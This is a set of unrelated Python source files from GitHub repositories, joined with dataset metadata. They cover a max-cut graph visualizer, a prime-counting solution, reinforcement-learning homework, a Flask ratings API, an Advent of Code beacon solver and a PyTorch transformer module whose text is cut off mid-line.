\"Flipped vertex \" + str(code)\n\t\t\t\tflip(triplets, code)\n\t\t\t\tE = [e for e in edges if e.n.group != e.m.group]\n\n\t\t\t# redraw the display window and graph\n\t\t\tGraph = disp_window(Img.copy(), WINDOW, E, msg)\n\t\t\tGraph = draw_graph(Graph, triplets, edges)\n\n\t\t\t# display the graph\n\t\t\tcv2.imshow('graph', Graph)\n\n\t\t\txPos = -1\n\n\tcv2.destroyAllWindows()\n\n\n# Runs when the mouse was clicked. 
Sets global variables xPos and\n# yPos when the mouse's left button was clicked\n#\n# event Mouse event\n# x x position of the cursor\n# y y position of the cursor\n# f passed over\n# p passed over\n#\n# returns None\ndef on_mouse_clicked(event, x, y, f, p):\n\tglobal xPos, yPos\n\tif event == cv2.EVENT_LBUTTONDOWN:\n\t\txPos, yPos = x, y\n\n\n# Processing ---\n\n# Flips the Node with the given ID\n#\n# triplets triplet of Nodes to lookup the Node by ID\n# ID ID of the node to flip\n#\n# returns None\ndef flip(triplets, ID):\n\tnode = None\n\tfor triplet in triplets:\n\t\tif ID == triplet[2].ID:\n\t\t\tnode = triplet[2]\n\tnode.group = not node.group\n\tgroup = \"B\" if node.group == True else \"A\"\n\topposite = \"A\" if group == \"B\" else \"B\"\n\tmsg = \"[ Flipped vertex \" + str(ID) + \" from group \" + group\n\tmsg += \" to group \" + opposite + \" ]\"\n\tprint(msg)\n\n\n# Maps out vertex location for all vertices in each vertex group\n#\n# v Set of groups of vertices\n# win Window width for displaying information\n# height Vertical distance between vertices\n# width Horizontal distance between vertex groups\n# marg Margin - padding size\n#\n# returns Tuple of list of triplets for all vertices: (x, y, Node)\n# and the Img to draw the graph's shape\ndef set_vertex_locations(v, win, height=125, width=100, marg=65):\n\ttriplets = []\n\tleft = marg\n\n\t# calculate the midpoint of the Img\n\tbiggest_group = max(v, key=len)\n\tmiddle = int(((len(biggest_group) - 1) * height) / 2) + marg\n\n\tfor groups in v:\n\t\t# calculates the horizontal and vertical starting point\n\t\tnodes_below = int(len(groups) / 2)\n\t\tif len(groups) % 2 == 0:\n\t\t\tnodes_below = nodes_below - 0.5\n\t\tbottom = int(middle - (nodes_below * height))\n\n\t\t# adds locations\n\t\tfor vertex in groups:\n\t\t\ttriplets.append((left, bottom, vertex))\n\t\t\tbottom += height\n\t\tleft += width\n\t\t\t\n\tImg_shape = (middle*2, ((len(v)-1) * width) + (marg*2) + win, 3)\n\treturn (triplets, Img_shape)\n\n\n# Users can click a location on the Graph. Based on the location,\n# checks if the location specified by x and y is within a Node in\n# the Graph. 
Returns a code based on the location's characteristics.\n#\n# triplets A list of triplets of all Nodes and their x and y\n# positions where each entry has the the form (x, y, Node)\n# x The x position of the location to check\n# y The y position of the location to check\n#\n# returns Return code (int) for the following situations\n# -4 Location is not in a Node\n# -3 Location is in the Source (unflippable)\n# -2 Location is in the Sink (unflippable)\n# -1 Location is another unswitchable Node\n# 0+ Location is in a valid Node with that ID \ndef check_location(triplets, x, y):\n\tfor triplet in triplets:\n\t\tif pt_is_in_circle((triplet[0], triplet[1]), (x, y)):\n\n\t\t\t# Point is in the source\n\t\t\tif triplet[2].ID == 0:\n\t\t\t\treturn -3\n\n\t\t\t# Point is in the sink\n\t\t\telif triplet[2].ID == len(triplets)-1:\n\t\t\t\treturn -2\n\n\t\t\t# Point is in a Node that has no neighbors in the\n\t\t\t# opposing parition\n\t\t\telif not is_frontier_node(triplet[2]):\n\t\t\t\treturn -1\n\n\t\t\t# Point is in a valid, flippable Node\n\t\t\telse:\n\t\t\t\treturn triplet[2].ID\n\n\t# Point is not within any Node\n\treturn -4\n\n\n# Calculates if the point is within the circle\n#\n# c (x, y) tuple representing the center of the circle\n# p (x, y) tuple representing the point\n#\n# returns True if the point resides in this circle, else False\ndef pt_is_in_circle(c, p):\n\tdist = np.sqrt(np.square(p[0] - c[0]) + np.square(p[1] - c[1]))\n\treturn dist <= RAD\n\n\n# Returns True if the given Node is a frontier node, i.e. any of\n# its neighbors are in the group opposite to itself\n#\n# node The Node to check\n#\n# returns True if the given node is a frontier node, else False\ndef is_frontier_node(node):\n\tfor e in node.edges:\n\t\tif e.n.group != e.m.group:\n\t\t\treturn True\n\treturn False\n\n\n# Drawing ---\n\n# Populates the display window with relevant information\n#\n# Img OpenCV image to fill the display window\n# win Window width for displaying information\n# E Edges that join partition [A, B]\n# msg Message to print in the display window\n# marg Margin - vertical padding for the display window\n#\n# returns The modified OpenCV image\ndef disp_window(Img, win, E, msg, marg=90):\n\t\n\tglobal BEST_COST\n\n\t# Draw bounding line\n\th, w, _ = Img.shape\n\tpt1, pt2 = (w-win, h-marg), (w-win, marg)\n\tImg = cv2.line(Img, pt1, pt2, BLACK, thickness=2)\n\tbegin_text_width, midpoint = (w-win) + 20, int(h/2)\n\n\t# Current Cost\n\tcost = localsearch.cost(E)\n\ttext = \"cost of current cut: \" + str(cost)\n\tpt = (begin_text_width, midpoint)\n\tImg = cv2.putText(Img, text, pt, FONT, 0.4, BLACK)\n\n\t# Update best cost\n\tBEST_COST = cost if cost > BEST_COST else BEST_COST\n\n\t# Best Cost\n\ttext = \"cost of best cut: \" + str(BEST_COST)\n\tpt = (begin_text_width, midpoint - 50)\n\tImg = cv2.putText(Img, text, pt, FONT, 0.4, BLACK)\n\n\t# Print Message\n\tpt = (begin_text_width, midpoint + 50)\n\tImg = cv2.putText(Img, msg, pt, FONT, 0.4, BLACK)\n\n\treturn Img\n\n\n# Draws the labelled vertices and edges. Wrapper function for\n# draw_edges and draw_vertices. 
\n#\n# Img OpenCV image to draw the graph\n# triplets List of vertices belonging to the graph in triplet form:\n# (x-position, y-position, Node)\n# edges List of Edge objects in the graph\n#\n# returns The modified OpenCV image\ndef draw_graph(Img, triplets, edges):\n\tImg = draw_edges(Img, triplets, edges)\n\tImg = draw_vertices(Img, triplets)\n\treturn Img\n\n\n# Draws the vertices and labels them with their IDs on an OpenCV\n# image (called after draw_edges)\n#\n# Img OpenCV image to draw the vertices\n# triplets List of vertices belonging to the graph in triplet form:\n# (x-position, y-position, Node)\n#\n# returns The modified OpenCV image\ndef draw_vertices(Img, triplets):\n\tfor triplet in triplets:\n\n\t\t# Gets the coordinates of the Node\n\t\tv = (triplet[0], triplet[1])\n\n\t\t# Set the color of the Node\n\t\tcol = GRAY\n\t\tif triplet[2].group != None:\n\t\t\tcol = RED if triplet[2].group == False else BLUE\n\n\t\t# Draw the Node\n\t\tImg = cv2.circle(Img, v, RAD, color=col, thickness=-1)\n\t\tImg = cv2.circle(Img, v, RAD, color=BLACK, thickness=2)\n\n\t\t# Write the Node ID\n\t\tID = str(triplet[2].ID)\n\t\tif len(ID) == 2:\n\t\t\tv = (triplet[0] - (OFFSET + 7), triplet[1] + (OFFSET + 2))\n\t\telse:\n\t\t\tv = (triplet[0] - (OFFSET + 1), triplet[1] + OFFSET)\n\t\tImg = cv2.putText(Img, ID, v, FONT, 0.6, WHITE)\n\n\treturn Img\n\n\n# Draws the edges on an OpenCV image. Finds the position of each\n# edge's vertices and draws an edge between both points, labeled\n# with its weight\n#\n# Img OpenCV image to draw the edges\n# triplets List of vertices belonging to the graph in triplet form:\n# (x-position, y-position, Node)\n# edges List of Edge objects in the graph\n#\n# returns The modified OpenCV image\ndef draw_edges(Img, triplets, edges):\n\n\t# Gets the location of the vertex with the given ID\n\t#\n\t# ID ID of the vertex being searched for\n\t# triplets List of vertices belonging to the graph in triplet form:\n # (x-position, y-position, vertex ID)\n #\n # returns Location (x, y) of the vertex with the given ID\n\tdef getVertexLocation(ID, triplets):\n\t\tfor triplet in triplets:\n\t\t\tif ID == triplet[2].ID:\n\t\t\t\treturn (triplet[0], triplet[1])\n\t\tprint(\"ERROR: No ID found\")\n\n\tfor edge in edges:\n\t\tn_loc = getVertexLocation(edge.n.ID, triplets)\n\t\tm_loc = getVertexLocation(edge.m.ID, triplets)\n\n\t\t# set color\n\t\tcol = BLACK\n\t\tif edge.n.group != edge.m.group:\n\t\t\tcol = TEAL\n\n\t\t# draw line\n\t\tImg = cv2.line(Img, n_loc, m_loc, color=col, thickness=2)\n\n\t\t# find a point between both nodes and label weight\n\t\tm = (int((n_loc[0]+m_loc[0])/2), int((n_loc[1]+m_loc[1])/2))\n\t\tm = (int((n_loc[0]+m[0])/2), int((n_loc[1]+m[1])/2 - 7))\n\t\tw = str(edge.weight)\n\t\tImg = cv2.putText(Img, w, m, FONT, 0.45, ORANGE, thickness=2)\n\n\treturn Img\n\n\n# Display Mode ---\n\n# As opposed to interactive mode, this mode takes no user input other\n# than 'n' for the next flip\n\n# Displays the entrie graph and output window\n#\n# nodes A list of Nodes of the graph\n# edges A list of Edges of the graph\n# msg The message to display\n# cost The cost of the current cut\n#\n# returns None\ndef display_graph(nodes, edges, msg, cost):\n\n\t# set the vertex locations in the image\n\ttriplets, dim = set_vertex_locations(nodes, WINDOW)\n\n\t# create a blank image\n\tImg = np.zeros(dim, np.uint8)\n\tImg[:] = BACKGROUND\n\n\t# draw the graph\n\tG = draw_graph(Img.copy(), triplets, edges)\n\n\t# seperate edges that join [A, B]\n\tbridge_edges = [e for e in edges if 
e.n.group != e.m.group]\n\n\t# populate display window\n\tG = display_window(G, WINDOW, bridge_edges, msg, cost)\n\n\t# display\n\tcv2.imshow('graph', G)\n\n\twhile True:\n\t\tk = cv2.waitKey(5) & 0xFF\n\t\tif k == 27 or k == ord('n'):\n\t\t\tbreak\n\n\n# Populates the display window with relevant information\n#\n# Img OpenCV image to fill the display window\n# win Window width for displaying information\n# bridging_edges Edges that join partition [A, B]\n# msg Message to print in the display window\n# cost Cost of the current cut\n# marg Margin - vertical padding for the display window\n#\n# returns The modified OpenCV image\ndef display_window(Img, win, bridge_edges, msg, cost, marg=90):\n\t\n\t# Draw bounding line\n\th, w, _ = Img.shape\n\tpt1, pt2 = (w-win, h-marg), (w-win, marg)\n\tImg = cv2.line(Img, pt1, pt2, BLACK, thickness=2)\n\tbegin_text_width, midpoint = (w-win) + 20, int(h/2)\n\n\t# Current Cost\n\ttext = \"cost of cut: \" + str(cost)\n\tpt = (begin_text_width, midpoint - 25)\n\tImg = cv2.putText(Img, text, pt, FONT, 0.4, BLACK)\n\n\t# Print Message\n\tpt = (begin_text_width, midpoint + 25)\n\tImg = cv2.putText(Img, msg, pt, FONT, 0.4, BLACK)\n\n\treturn Img\n","repo_name":"andy9kv/Projects","sub_path":"Project_Files/Maxcut_Analysis/code/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":13157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20512490537","text":"# [Count-Number-Up-To-N, Prime-Factor, Classic]\n# https://leetcode.com/problems/count-primes/\n# 204. Count Primes\n\n# https://en.wikipedia.org/wiki/Sieve_of_Eratosthenes\n# https://www.youtube.com/watch?v=Kwo2jkHOyPY\n\n# Count the number of prime numbers less than a non-negative number, n.\n#\n# Example:\n#\n# Input: 10\n# Output: 4\n# Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n\n\nclass Solution(object):\n def countPrimes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n dp = [True] * n\n\n for i in range(2, int(n ** 0.5 + 1)):\n if dp[i]:\n # set times of i to False starting from i^2\n for time in range(i * i, n, i):\n dp[time] = False\n\n return len([1 for i in range(2, n) if dp[i] == True])\n\n\n# Appendix: is_prime implementation\ndef is_prime(n):\n for i in range(2, int(n ** 0.5 + 2)):\n if i < n and n % i == 0:\n return False\n\n return True\n","repo_name":"Frankiee/leetcode","sub_path":"math/count_number_up_to_n/204_count_primes.py","file_name":"204_count_primes.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13457857770","text":"from pyexpat import model\r\nfrom time import sleep\r\nimport gym\r\nimport numpy as np\r\nimport utils\r\nimport solutions\r\n\r\n\r\ndef problem_1(large=False, is_slippery=False, test=False):\r\n if large:\r\n env = gym.make('FrozenLake8x8-v1', is_slippery=is_slippery)\r\n else:\r\n env = gym.make('FrozenLake-v1', is_slippery=is_slippery)\r\n if test:\r\n with open(\"policy1.npy\", \"rb\") as f:\r\n policy = np.load(f)\r\n solutions.test_1(env, policy)\r\n return\r\n num_steps = env._max_episode_steps\r\n num_states = env.observation_space.n\r\n num_actions = env.action_space.n\r\n env_model = env.P\r\n gamma = 1.0\r\n q_pi = np.ones((num_states, num_actions)) / num_actions\r\n V, q = solutions.policy_iteration(env_model, q_pi, gamma=gamma)\r\n if input(\"Save policy? 
(y/n)\") == \"y\":\r\n with open(\"q_values1.npy\", \"wb\") as f:\r\n np.save(f, q)\r\n with open(\"policy1.npy\", \"wb\") as f:\r\n np.save(f, np.argmax(q, axis=1))\r\n # how to get from here to optimal?\r\n # add visualization: see mins 50-55\r\n if large:\r\n utils.plot_value_function(V.reshape(8,8))\r\n else:\r\n utils.plot_value_function(V.reshape(4,4))\r\n utils.plot_value_function(q)\r\n policy = np.argmax(q, axis=1)\r\n utils.plot_value_function(np.equal(q, np.max(q, axis=1, keepdims=True)))\r\n # with open(\"policy1.npy\", \"wb\") as f:\r\n # np.save(f, policy)\r\n\r\ndef problem_2():\r\n env = gym.make('FrozenLake8x8-v1', is_slippery=True)\r\n num_train_episodes = 5000\r\n num_eval_episodes = 50\r\n num_steps = env._max_episode_steps\r\n num_states = env.observation_space.n\r\n num_actions = env.action_space.n\r\n gamma = 1.0\r\n alpha = 0.1\r\n max_epsilon = 1.0\r\n min_epsilon = 0.01\r\n epsilon_decay_rate = 0.005\r\n eval_itrs = 50\r\n\r\n # Q Learning\r\n Q = np.ones((num_states, num_actions)) / num_actions\r\n # where does eval come in?\r\n Q = solutions.q_learning(env, Q, num_steps)\r\n utils.plot_value_function(Q)\r\n policy = np.argmax(Q, axis=1)\r\n utils.plot_value_function(np.equal(Q, np.max(Q, axis=1, keepdims=True)))\r\n\r\ndef problem_3a(plot=False):\r\n if plot:\r\n solutions.plot3()\r\n return\r\n env = gym.make('Acrobot-v1')\r\n env.reset()\r\n num_actions = env.action_space.n\r\n cos_theta1 = [-0.75, -0.5, -0.25, 0, 0.25, 0.5, 0.75]\r\n sin_theta1 = [0]\r\n cos_theta2 = [-0.75, -0.5, -0.25, 0, 0.25, 0.5, 0.75]\r\n sin_theta2 = [0]\r\n vel_theta1 = [-4, -2, -1, 0, 1, 2, 4]\r\n vel_theta2 = [-6, -3, -1.5, 0, 1.5, 3, 6]\r\n Q = np.zeros(((len(cos_theta1) + 1) * (len(sin_theta1) + 1) * (len(cos_theta2) + 1) * (len(sin_theta2) + 1) * (len(vel_theta1) + 1) * (len(vel_theta2) + 1), num_actions))\r\n # with open(\"q_values.npy\", \"rb\") as f:\r\n # Q = np.load(f)\r\n solutions.q_learning3a(env, Q, cos_theta1, sin_theta1, cos_theta2, sin_theta2, vel_theta1, vel_theta2)\r\n\r\ndef problem_3b(test=False):\r\n env = gym.make('MountainCar-v0')\r\n env.reset()\r\n # print(env.action_space)\r\n # print(env.observation_space)\r\n #problem_3b_experiment(env)\r\n num_actions = env.action_space.n\r\n # position_states = np.array([-0.9, -0.8, -0.7, -0.64, -0.62, -0.6, -0.59, -0.58, -0.57, -0.56 -0.55, -0.53, -0.5, -0.45, -0.4, -0.1])\r\n # velocity_states = np.array([-0.02, -0.01, -0.005, -0.003, -0.001, 0, 0.001, 0.003, 0.005, 0.01, 0.02, 0.03])\r\n position_states = np.array([-0.95, -0.7, -0.58, -np.pi/6, -0.47, -0.35 -0.1])\r\n velocity_states = np.array([-0.02, 0, 0.02])\r\n # position_states = [-0.8, -0.6, -0.4]\r\n # velocity_states = [-0.01, 0, 0.02]\r\n #velocity_states = [0]\r\n Q = np.zeros(((len(position_states) + 1) * (len(velocity_states) + 1), num_actions))\r\n with open(\"q_values_3b.npy\", \"rb\") as f:\r\n Q = np.load(f)\r\n if test:\r\n solutions.test_3b(env, Q, position_states, velocity_states)\r\n else:\r\n solutions.q_learning3b(env, Q, position_states, velocity_states)\r\n\r\nimport matplotlib.pyplot as plt\r\ndef problem_3b_experiment(env, num_samples=10000):\r\n samples = np.zeros((num_samples, 2))\r\n\r\n for n in range(num_samples):\r\n print(env.step(np.random.choice([0, 1, 2], p=[0.4,0.4,0.2])))\r\n samples[n] = env.state\r\n plt.hist(samples[:, 0])\r\n plt.show()\r\n plt.figure()\r\n plt.hist(samples[:,1])\r\n plt.show()\r\n print(np.max(samples, axis=0), np.min(samples, axis=0))\r\n\r\n\r\n\r\n# problem_1(large=True, is_slippery=True, 
test=False)\r\n#problem_2()\r\nproblem_3a()\r\n# problem_3b()\r\n","repo_name":"ethanglaser/Intelligent-Autonomous-Systems","sub_path":"Project4/project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27948920222","text":"from flask import request\nfrom flask_restful import Resource\nfrom http import HTTPStatus\nfrom models.user import User\nfrom models.item import Item\nfrom models.rating import Rating\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom schemas.rating import RatingSchema\nfrom resources.util import item_not_found\n\nrating_schema = RatingSchema()\nrating_list_schema = RatingSchema(many=True)\n\n\nclass RatingListResource(Resource):\n    # the GET method fetches all of an item's ratings\n    def get(self, item_id):\n        item = Item.get_by_id(item_id=item_id)\n        if item is None:\n            return item_not_found()\n        ratings = Rating.get_by_item(item_id=item.id)\n        return rating_list_schema.dump(ratings).data, HTTPStatus.OK\n\n    # POST method for creating a rating\n    @jwt_required\n    def post(self, item_id):\n        json_data = request.get_json()\n        current_user = get_jwt_identity()\n        data, errors = rating_schema.load(data=json_data)\n        item = Item.get_by_id(item_id=item_id)\n\n        if errors:\n            return {\"message\": \"Validation errors\", \"errors\": errors}, HTTPStatus.BAD_REQUEST\n\n        if Rating.get_by_user_item(user_id=current_user, item_id=item.id) is not None:\n            return {\"message\": \"You have already rated this item\"}\n\n        rating = Rating(**data)\n        rating.user_id = current_user\n        rating.item_id = item.id\n        rating.save()\n\n        update_ratings(item_id=item.id)\n\n        return rating_schema.dump(rating).data, HTTPStatus.CREATED\n\n    # PATCH method for modifying an existing rating\n    @jwt_required\n    def patch(self, item_id):\n        json_data = request.get_json()\n        current_user = get_jwt_identity()\n        data, errors = rating_schema.load(data=json_data, partial=(\"name\", ))\n        item = Item.get_by_id(item_id=item_id)\n\n        if errors:\n            return {\"message\": \"Validation errors\", \"errors\": errors}, HTTPStatus.BAD_REQUEST\n\n        if item is None:\n            return item_not_found()\n\n        if current_user != item.user_id:\n            return {\"message\": \"Access not allowed\"}, HTTPStatus.FORBIDDEN\n\n        rating = Rating.get_by_user_item(user_id=current_user, item_id=item.id)\n\n        rating.rating = data.get(\"rating\") or rating.rating\n        rating.rating_text = data.get(\"rating_text\") or rating.rating_text\n\n        rating.save()\n\n        update_ratings(item_id=item.id)\n\n        return rating_schema.dump(rating).data, HTTPStatus.OK\n\n\n# Function for updating ratings\ndef update_ratings(item_id):\n    # variables related to the item\n    item = Item.get_by_id(item_id=item_id)\n    ratings = Rating.get_by_item(item_id=item_id)\n    i_rating = 0.0\n    r = 0\n    # variables related to the user\n    user = User.get_by_id(id=item.user_id)\n    user_items = Item.get_all_by_user(user_id=item.user_id)\n    u_rating = 0.0\n    ru = 0\n\n    # compute the average of the item's ratings\n    for rating in ratings:\n        r = r + 1\n        i_rating = i_rating + rating.__dict__[\"rating\"]\n\n    i_rating_dict = {\"rating\": i_rating / r}\n    item.rating = i_rating_dict.get(\"rating\")\n\n    # compute the average rating of all the user's items\n    for rating in user_items:\n        if rating.__dict__[\"rating\"] is None:\n            continue\n        ru = ru + 1\n        u_rating = u_rating + rating.__dict__[\"rating\"]\n\n    u_rating_dict = {\"rating\": u_rating / ru}\n    user.rating = u_rating_dict.get(\"rating\")\n\n    # save the 
changes\n    item.save()\n    user.save()\n","repo_name":"JarkkoJake/Application-programming","sub_path":"resources/rating.py","file_name":"rating.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22078011357","text":"import numpy as np\nfrom scipy.spatial.distance import pdist\nfrom itertools import combinations, compress\n\n\ndef read_data(data_path):\n    \"\"\"\n    Reads data\n    \"\"\"\n\n    # Define read parameters\n    data = {}\n    read = False\n    sc_num = None\n    scanner = None\n\n    # Read input\n    f = open(data_path, \"r\")\n    for x in f:\n        if len(x.strip()) == 0:\n            read = False\n            data[sc_num] = np.array(scanner)\n        if read:\n            scanner.append([int(i) for i in x.strip().split(\",\")])\n        if x.strip().startswith(\"---\"):\n            read = True\n            sc_num = int(x.strip().split(\" \")[2])\n            scanner = []\n\n    # Save last scanner data\n    data[sc_num] = np.array(scanner)\n    return data, scanner\n\n\ndef get_comb_search(max_beacons):\n    \"\"\"\n    Calculates dictionary of combination numbers C(n, 2) for search\n    \"\"\"\n    comb = {}\n    for i in range(1, max_beacons + 1):\n        comb[int(i * (i - 1) / 2)] = i\n    return comb\n\n\ndef calculate_distances(data):\n    \"\"\"\n    Calculates distances between beacons per scanner\n    \"\"\"\n    # calculate distances\n    distances = {}\n    for sc in data:\n        distances[sc] = pdist(data[sc])\n    return distances\n\n\ndef get_common_beacons(distances, comb):\n    \"\"\"\n    Calculate number of beacons in common between two scanners\n    \"\"\"\n    similarities = {}\n    for i in distances:\n        for j in distances:\n            if i > j:\n                simil = [di in distances[j] for di in distances[i]]\n                if sum(simil) in comb:\n                    similarities[(i, j)] = comb[sum(simil)]\n    return similarities\n\n\ndef beacons_map(i, j, distant, data):\n    \"\"\"\n    Get mappings between beacons from the point of view of scanners i and j\n    \"\"\"\n\n    # Get combinations for distances\n    dist_idx_i = list(combinations(range(data[i].shape[0]), 2))\n    dist_idx_j = list(combinations(range(data[j].shape[0]), 2))\n\n    # Create mappings\n    mappings = []\n    for sc_i in range(data[i].shape[0]):\n        dists_sc_i = distant[i][[sc_i in idx_i for idx_i in dist_idx_i]]\n        mask_j = [dist_j in dists_sc_i for dist_j in distant[j]]\n        if sum(mask_j) > 0:\n            maps_j = list(sum(list(compress(dist_idx_j, mask_j)), ()))\n            map_sc_i = [k for k in set(maps_j) if maps_j.count(k) > 1]\n            if len(map_sc_i) > 1:\n                print(f\"More than 1 point to map: {i}:{sc_i}, {j}:{map_sc_i}\")\n            else:\n                mappings.append((sc_i, map_sc_i[0]))\n    return mappings\n\n\ndef get_coordinates(i, j, bmap, data):\n    \"\"\"\n    Get ordered coordinates for scanners i and j\n    \"\"\"\n    # Get positions\n    pos_i = [bmap[map_id][0] for map_id in range(len(bmap))]\n    pos_j = [bmap[map_id][1] for map_id in range(len(bmap))]\n    crd_i = data[i][pos_i]\n    crd_j = data[j][pos_j]\n    return [crd_i, crd_j]\n\n\ndef get_coord_mapping(coord_pairs):\n    \"\"\"\n    Get coordinates mapping between scanners i and j\n    \"\"\"\n    # Search for appropriate pair difference\n    was_matched = False\n    for i in range(1, len(coord_pairs[0])):\n        diff0 = coord_pairs[0][i] - coord_pairs[0][i - 1]\n        diff1 = coord_pairs[1][i] - coord_pairs[1][i - 1]\n        crd0 = [abs(a) for a in diff0]\n        crd1 = [abs(a) for a in diff1]\n        if len(set(crd0)) == 3 and set(crd0) == set(crd1) and (0 not in set(crd1)):\n            was_matched = True\n            break\n\n    # Get order and sign mapping for selected scanners\n    if not was_matched:\n        print(\"Trouble getting coordinate mapping\")\n    else:\n        order = [crd1.index(k) for k in crd0]\n        
diff1_ord = diff1[order]\n sign = [1 if diff0[k] == diff1_ord[k] else -1 for k in range(3)]\n\n return [order, sign]\n\n\ndef recalculate_data(data, i, j, order, sign, bc):\n \"\"\"\n Recalculates data (reorders and changes sign), returns scanner position\n \"\"\"\n data[j] = data[j][:, order]\n for k in range(3):\n data[j][:, k] = data[j][:, k] * sign[k]\n\n # Calculates scanner coordinates\n scanner = data[i][bc[0]] - data[j][bc[1]]\n\n # Recalculation to first scanner\n for k in range(3):\n data[j][:, k] = data[j][:, k] + scanner[k]\n\n return data, scanner\n\n\ndef relativise_data(common, limit_pairs, data, distant):\n \"\"\"\n Identify relative positions of scanners to scanner 0\n \"\"\"\n\n known = [0]\n scanners = {0: [0, 0, 0]}\n pairs = [c for c in common if common[c] >= limit_pairs]\n\n while len(known) < len(data):\n for (p1, p2) in pairs:\n if sum([p1 in known, p2 in known]) == 1:\n p_unkno = p1 if p2 in known else p2\n p_known = p1 if p1 in known else p2\n known.append(p_unkno)\n\n # Get mappings between beacons\n beacon_map = beacons_map(p_known, p_unkno, distant, data)\n coord_pairs = get_coordinates(p_known, p_unkno, beacon_map, data)\n order, sign = get_coord_mapping(coord_pairs)\n\n # Rearrange and transform the data of the scanner to be added\n data, scanners[p_unkno] = recalculate_data(\n data, p_known, p_unkno, order, sign, beacon_map[0]\n )\n\n return scanners, data\n\n\nif __name__ == \"__main__\":\n\n # Read data\n data_path = \"input\"\n limit_pairs = 12\n data, scanner = read_data(data_path)\n max_beacons = max([len(i) for i in data.values()])\n\n # Get beacons in common between two scanners\n comb = get_comb_search(max_beacons)\n distant = calculate_distances(data)\n common = get_common_beacons(distant, comb)\n\n # Recalculate data\n scanners, data = relativise_data(common, limit_pairs, data, distant)\n\n # Get unique beacons from recalculated coordinates\n output = set()\n for i in range(len(data)):\n output = output.union(set([tuple(a) for a in data[i]]))\n\n print(f\"There are {len(output)} different beacons on the map\")\n\n # Get max scanner distance\n max_dist = 0\n for i in scanners:\n for j in scanners:\n if i > j:\n dist = sum([abs(scanners[i][k] - scanners[j][k]) for k in range(3)])\n max_dist = max(max_dist, dist)\n\n print(f\"Farthest scanners are {max_dist} units apart\")\n","repo_name":"jakuberan/AoC-2021","sub_path":"day_19/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38420288504","text":"import copy\nfrom typing import Optional\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn, Tensor\nfrom torch.nn import MultiheadAttention\n\nclass Encoder(nn.Module):\n\n def __init__(self, d_model=2048, nhead=4, num_encoder_layers=1,\n num_decoder_layers=2, dim_feedforward=8192, dropout=0.1,\n ):\n super().__init__()\n\n self.num_encoder_layers = num_encoder_layers\n\n #############################################################################################\n encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n encoder_norm = None\n self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers, encoder_norm)\n #############################################################################################\n decoder_layer = TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout)\n decoder_norm = nn.LayerNorm(d_model)\n self.decoder = 
TransformerDecoder(decoder_layer, num_decoder_layers, decoder_norm)\n #############################################################################################\n self._reset_parameters()\n\n self.d_model = d_model\n self.nhead = nhead\n\n self.rm_self_attn_dec_func()\n\n def rm_self_attn_dec_func(self):\n total_modifie_layer_num = 0\n rm_list = []\n for idx, layer in enumerate(self.decoder.layers):\n \n layer.omit_selfattn = True\n del layer.self_attn\n del layer.dropout1\n del layer.norm1\n\n total_modifie_layer_num += 1\n rm_list.append(idx)\n\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src, query_embed, pos_embed, mask=None):\n bs, c, h, w = src.shape\n src = src.flatten(2).permute(2, 0, 1) \n pos_embed = pos_embed.flatten(2).permute(2, 0, 1)\n query_embed = query_embed.unsqueeze(1).repeat(1, bs, 1)\n if mask is not None:\n mask = mask.flatten(1)\n\n \n if self.num_encoder_layers > 0:\n memory = self.encoder(src, src_key_padding_mask=mask, pos=pos_embed)\n else:\n memory = src\n\n tgt = torch.zeros_like(query_embed)\n hs = self.decoder(tgt, memory, memory_key_padding_mask=mask,\n pos=pos_embed, query_pos=query_embed)\n \n return hs.transpose(1, 2), memory[:h*w].permute(1, 2, 0).view(bs, c, h, w)\n\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self, encoder_layer, num_layers, norm=None):\n super().__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, src,\n mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None):\n output = src\n\n for layer in self.layers:\n output = layer(output, src_mask=mask,\n src_key_padding_mask=src_key_padding_mask, pos=pos)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n\n\nclass TransformerDecoder(nn.Module):\n\n def __init__(self, decoder_layer, num_layers, norm=None):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n output = tgt\n\n for layer in self.layers:\n output = layer(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n pos=pos, query_pos=query_pos) \n\n if self.norm is not None:\n output = self.norm(output)\n\n return output.unsqueeze(0)\n\n\nclass TransformerEncoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1):\n super().__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = 